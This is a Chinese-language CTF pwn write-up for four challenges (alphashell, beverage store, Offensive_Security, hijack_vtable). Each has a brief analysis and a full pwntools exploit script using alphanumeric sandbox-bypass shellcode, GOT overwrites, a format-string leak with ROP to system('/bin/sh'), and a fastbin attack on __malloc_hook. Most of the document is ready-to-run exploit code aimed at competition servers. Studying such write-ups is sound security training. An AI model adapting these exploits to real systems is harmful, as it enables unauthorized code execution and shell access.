alphashell
分析
要求输入字符为可见字符
sandbox禁用了open write writev read和execve等函数
EXP
from pwn import *
from ctypes import *
from ae64 import AE64
#----------------function area start----------------#
sla = lambda ch,data:p.sendlineafter(ch,data)
sda = lambda ch,data:p.sendafter(ch,data)
sd = lambda data:p.send(data)
sl = lambda data:p.sendline(data)
addr32 = lambda:u32(p.recvuntil(b"\xf7")[-4:])
addr64 = lambda:u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
lg = lambda addr_name,addr:log.success("{} --> {}".format(addr_name,hex(addr)))
ru = lambda con:p.recvuntil(con)
def debug(bp=0):
gdb.attach(p,bp)
pause()
#----------------function area end------------------#
p = process("./attachment")
# p = remote('125.70.243.22','31709')
# context.log_level = 'debug'
context.arch='amd64'
sc=asm('''
xor rsi,rsi
mov rbx,0x67616c662f
push rbx
mov rdx,0
xor r10,r10
mov rdi,r10
mov rsi, rsp
mov eax,SYS_openat
syscall
mov rsi,rax
mov r10,0x100
xor rdx,rdx
mov rdi,1
mov eax,SYS_sendfile
syscall
''')
obj = AE64()
payload = obj.encode(sc,'rdx')
# debug()
p.send(payload)
p.interactive()
beverage store
分析
类型转换错误,导致可以反向越界修改之前的内容
对于这道题,可以先修改exit got,重启程序流程
接着修改printf got为system,最后把exit got重新改为后门函数地址即可
EXP
from pwn import *
from ctypes import *
#----------------function area start----------------#
sla = lambda ch,data:p.sendlineafter(ch,data)
sda = lambda ch,data:p.sendafter(ch,data)
sd = lambda data:p.send(data)
sl = lambda data:p.sendline(data)
addr32 = lambda:u32(p.recvuntil(b"\xf7")[-4:])
addr64 = lambda:u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
lg = lambda addr_name,addr:log.success("{} --> {}".format(addr_name,hex(addr)))
ru = lambda con:p.recvuntil(con)
def debug(bp=0):
gdb.attach(p,bp)
pause()
#----------------function area end------------------#
# p = process("./pwn")
p = remote('125.70.243.22','31668')
libc = ELF('./libc.so.6')
clibc = cdll.LoadLibrary('./libc.so.6')
context.log_level='debug'
ru("id")
p.send(b'B'*0x10)
clibc.srand(0x42424242)
num = clibc.rand()
ru("code:")
sl(str(num))
sleep(1)
sl(b'-4')
payload = p64(0x40133B) + p64(0x401511)
sd(payload)
sl(b'-6')
sleep(1)
sd(b'a')
libc_base = addr64() - 0x46061
lg('libc_base',libc_base)
system = libc_base + libc.sym['system']
sleep(1)
sl(b'-7')
payload = p64(system)
sd(payload)
sl(b'-4')
sleep(1)
payload = p64(0x401511)
sd(payload)
p.interactive()
Offensive_Security
分析
多线程但是未对资源加锁,输入任意同样的字符串即可绕过限制
存在格式化字符串漏洞,可泄露密码和libc基址
最后栈溢出然后getshell
EXP
from pwn import *
from ctypes import *
#----------------function area start----------------#
sla = lambda ch,data:p.sendlineafter(ch,data)
sda = lambda ch,data:p.sendafter(ch,data)
sd = lambda data:p.send(data)
sl = lambda data:p.sendline(data)
addr32 = lambda:u32(p.recvuntil(b"\xf7")[-4:])
addr64 = lambda:u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
lg = lambda addr_name,addr:log.success("{} --> {}".format(addr_name,hex(addr)))
ru = lambda con:p.recvuntil(con)
def debug(bp=0):
gdb.attach(p,bp)
pause()
#----------------function area end------------------#
# p = process("./attachment")
elf = ELF('./attachment')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# context.log_level = 'debug'
while True:
sleep(1)
try:
p = remote('125.70.243.22','31652')
sleep(0.1)
sla('Username:','%7$s%39$p')
ru('Welcome, \n')
passwd = p.recv(8)
sleep(0.1)
sl(passwd)
libc_leak = addr64()
lg('libc_leak',libc_leak)
if (libc_leak & 0xff) == 0x80:
libc_base = libc_leak - 0x21b780
lg('libc base',libc_base)
sl('1')
sl('1')
ogs = [0xebc81,0xebc85,0xebc88]
payload = b'A'*0x28 + p64(0x0000000000400462) + p64(0x0000000000400661) + p64(libc_base+next(libc.search(b'/bin/sh'))) + p64(libc_base+libc.sym.system)
sla('>',payload)
p.interactive()
break
else:
raise('环境有毛病')
except:
p.close()
continue
hijack_vtable
分析
没啥好分析的,add、show、delete、edit都没限制,直接fastbin attack打malloc hook
EXP
from pwn import *
from ctypes import *
#----------------function area start----------------#
sla = lambda ch,data:p.sendlineafter(ch,data)
sda = lambda ch,data:p.sendafter(ch,data)
sd = lambda data:p.send(data)
sl = lambda data:p.sendline(data)
addr32 = lambda:u32(p.recvuntil(b"\xf7")[-4:])
addr64 = lambda:u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
lg = lambda addr_name,addr:log.success("{} --> {}".format(addr_name,hex(addr)))
ru = lambda con:p.recvuntil(con)
def debug(bp=0):
gdb.attach(p,bp)
pause()
#----------------function area end------------------#
# p = process("./pwn")
p = remote('125.70.243.22','31986')
libc = ELF('./libc.so.6')
context.log_level = 'debug'
def cmd(choice):
sla('choice:',str(choice))
def add(idx,size):
cmd(1)
sleep(0.1)
sla('index',str(idx))
sleep(0.1)
sla('size',str(size))
def delete(idx):
cmd(2)
sla('index',str(idx))
def edit(idx,len,con):
cmd(3)
sla('index',str(idx))
sleep(0.1)
sla('length:',str(len))
sleep(0.1)
sla('content:',con)
def show(idx):
cmd(4)
sla('index',str(idx))
add(0,0x100)
add(1,0x60)
delete(0)
show(0)
libc_base = addr64() - 0x39bb78
lg('libc base',libc_base)
malloc_hook = libc_base + libc.symbols['__malloc_hook']
delete(1)
edit(1,0x10,p64(malloc_hook - 0x23))
add(0,0x100)
add(1,0x60)
add(2,0x60)
edit(2,0x30,b'a'*0x13 + p64(libc_base + 0xd5c07))
add(3,0x10)
# debug()
p.interactive()
若有收获,三连加关注,学习不迷路